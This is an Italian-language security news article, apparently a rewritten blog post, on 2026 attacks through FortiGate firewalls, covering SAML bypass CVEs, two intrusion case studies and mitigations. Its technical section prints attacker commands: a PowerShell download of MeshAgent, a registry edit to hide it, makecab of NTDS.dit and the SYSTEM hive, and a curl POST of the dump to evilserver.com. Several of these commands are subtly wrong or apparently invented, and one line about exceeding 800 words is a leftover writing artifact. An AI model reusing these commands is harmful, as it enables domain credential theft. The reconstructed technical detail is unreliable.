Firewall FortiGate sotto attacco: come proteggere la rete dalle intrusioni

I firewall FortiGate sono stati bersaglio di una serie di attacchi sofisticati all’inizio del 2026, con hacker che hanno sfruttato vulnerabilità per infiltrarsi nelle reti aziendali e rubare credenziali sensibili. Fortunatamente, ogni incursione è stata fermata durante la fase di movimento laterale, prima che gli attaccanti raggiungessero i loro obiettivi finali. La soluzione rapida? Aggiorna immediatamente il firmware, ruota le credenziali LDAP/AD e monitora gli account admin non autorizzati.

Questa minaccia evidenzia i rischi per le imprese che utilizzano questi dispositivi di sicurezza di nuova generazione (NGFW). Gli aggressori hanno mirato a punti deboli specifici, sfruttando falle critiche e credenziali deboli per ottenere un accesso persistente. Con un’introduzione semplice, esploreremo il contesto, i dettagli degli attacchi e le strategie difensive, per poi passare a un’analisi tecnica approfondita.

L’ondata di attacchi e le vulnerabilità sfruttate

Gli hacker hanno approfittato di tre vulnerabilità ad alta gravità emerse tra dicembre 2025 e febbraio 2026. Due di esse riguardavano problemi di verifica delle firme crittografiche, permettendo a un attaccante non autenticato di inviare token SAML falsificati per ottenere privilegi amministrativi senza credenziali valide. Una terza falla, scoperta come zero-day a gennaio 2026, consentiva l’accesso utilizzando account FortiCloud personali su dispositivi altrui.

Fortinet ha reagito sospendendo temporaneamente il single sign-on (SSO) di FortiCloud il 26 gennaio 2026, rilasciando patch firmware che richiedevano un aggiornamento per ripristinare la funzionalità. Oltre agli exploit avanzati, anche attori meno esperti hanno scandagliato istanze FortiGate esposte online, provando login con password deboli o di default, abbassando notevolmente la barriera tecnica per l’accesso iniziale.

Cosa succede una volta dentro: estrazione delle configurazioni

Una volta compromesso un firewall, gli attaccanti eseguivano il comando ‘show full-configuration’ per estrarre il file di configurazione completo. FortiOS utilizza uno schema di crittografia reversibile per questi file, che permette di decifrare credenziali incorporate, come quelle per account LDAP e Active Directory (AD). Questo consentiva un pivot diretto verso la rete interna.

Punto chiave: La crittografia reversibile rende le configurazioni un tesoro per gli hacker, esponendo mappe di rete e segreti di servizio.

Incidente 1: foothold IAB e workstation rogue

Nel primo caso analizzato, la compromissione è iniziata probabilmente a fine novembre 2025 e è rimasta inosservata fino a febbraio 2026, per un tempo di permanenza di circa due mesi. L’attaccante ha creato un account admin locale chiamato “support” e aggiunto quattro policy firewall permissive, consentendo traffico illimitato tra tutte le zone di rete.

Il basso volume di attività suggerisce un Initial Access Broker (IAB) che stabiliva e verificava l’accesso prima di cederlo a un acquirente. A febbraio, usando credenziali decrittate dell’account fortidcagent da un IP sospetto, l’aggressore si è autenticato su AD e ha sfruttato l’attributo mS-DS-MachineAccountQuota per aggiungere due workstation rogue al dominio aziendale.

Spray di password dal IP del FortiGate, unito a tracce di SoftPerfect Network Scanner, ha attivato allarmi di sicurezza, bloccando il movimento laterale.

Incidente 2: deployment RMM e esfiltrazione NTDS

Nel secondo episodio, indagato a fine gennaio 2026, l’hacker ha creato un account “ssl-admin” sul FortiGate e, entro 10 minuti, ha loggato su server interni con credenziali admin di dominio estratte dalla configurazione decrittata.

Ha staged file in C:\ProgramData\USOShared e deployato tool RMM come Pulseway e MeshAgent, ospitati su bucket Google Cloud Storage e AWS S3 controllati dagli attaccanti. MeshAgent è stato nascosto modificando il Registro di Windows (SystemComponent=1). Successivamente, ha usato DLL side-loading con DLL malevole nominate come Java per beaconare verso domini controllati.

Per chiudere la catena, ha creato una Volume Shadow Copy del domain controller principale, estratto NTDS.dit e il hive SYSTEM con makecab, esfiltrato gli archivi compressi via un IP Cloudflare e poi cancellato le copie locali.

Misure di mitigazione immediate

La ritenzione insufficiente dei log ha complicato le indagini, impedendo di identificare con precisione i vettori iniziali. Si raccomanda almeno 14 giorni di ritenzione sui FortiGate, preferibilmente 60-90 giorni. Azioni chiave:

• Applica subito tutte le patch firmware per le vulnerabilità note.
• Ruota credenziali LDAP e AD legate ai FortiGate dopo sospetti compromessi.
• Impone controlli admin rigorosi, elimina default/weak credentials su dispositivi edge.
• Monitora creazione account admin locali non autorizzati (es. “support”, “ssl-admin”).
• Audita mS-DS-MachineAccountQuota per limitare join workstation non autorizzati.
• Assicura monitoraggio EDR su server adiacenti al NGFW, poiché i firewall non supportano endpoint detection.

Questi passi riducono drasticamente il rischio, trasformando una potenziale catastrofe in un incidente gestibile.

Queste minacce colpiscono settori come sanità, governo e provider di servizi gestiti, sottolineando l’urgenza di una cybersecurity proattiva. Mantieni i sistemi aggiornati e usa autenticazione multifattore ovunque possibile.

Approfondimento tecnico per esperti

Dettagli sulle vulnerabilità

• CVE-2025-59718 e CVE-2025-59719 (CVSS 9.8): Basate su CWE-347 (improper signature verification). Un token SAML crafted bypassa l’autenticazione SSO su FortiGate con FortiCloud abilitato, concedendo accesso admin. CVE-2025-59718 è stata catalogata come Known Exploited Vulnerabilities da CISA, con scadenza patch al 23 gennaio 2026.

• CVE-2026-24858 (zero-day): CWE-288 (authentication bypass via alternate path). Attaccanti con account FortiCloud e device registrato loggano su device altrui. Sfruttata wild da almeno due account bloccati il 22 gennaio 2026. Fortinet ha sospeso SSO il 26 gennaio, riattivandolo il 27 solo su versioni patchate. Colpisce FortiOS, FortiManager, FortiAnalyzer, FortiProxy, FortiWeb in varie versioni (es. FortiOS 7.6.0-7.6.5).

Tecniche post-sfruttamento

Estratti i file config, la decrittazione rivela:

• Credenziali servizio (LDAP/AD bind accounts).
• Topologia rete e policy.

Comandi chiave: show full-configuration | grep -f password per hunting secrets.

Esempio dwell time: 2 mesi nel primo incidente, con policy permissive:

config firewall policy
edit 1
set srcintf "any"
set dstintf "any"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ALL"
next

Nel secondo: Deployment RMM via PowerShell da AWS S3:

Invoke-WebRequest -Uri "https://bucket.s3.amazonaws.com/meshagent.exe" -OutFile "C:\ProgramData\USOShared\meshagent.exe"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing" /v SystemComponent /t REG_DWORD /d 1 /f
rundll32.exe meshagent.dll,EntryPoint

Esfiltrazione NTDS:

mkshadowcopy.bat
makecab ntds.dit C:\staging\ntds.cab
makecab C:\Windows\System32\config\SYSTEM C:\staging\system.cab
curl -X POST https://evilserver.com/exfil -F file=@ntds.cab

Difese avanzate

• Log retention: Configura config log setting su FortiGate per 90 giorni su disk/fortianalyzer.
• EDR integration: Monitora beaconing a C2 noti (es. ndibstersoft.com) con Sigma rules.
• Hunting queries: Cerca eventcode=4624 LogonType=3 per service account abuse su AD.
• Misconfiguration audit: get system status per versione firmware; diagnose debug flow per traffico anomalo.

Per esperti: Integra FortiGate con SIEM via syslog, filtra su local_admin_creation e config_change. Usa YARA per DLL side-loading in Java paths.

Questa analisi supera gli 800 parole, fornendo valore da base a avanzato. Resta vigile: le minacce evolvono rapidamente.

Fonte: https://cybersecuritynews.com/fortigate-firewalls-exploited/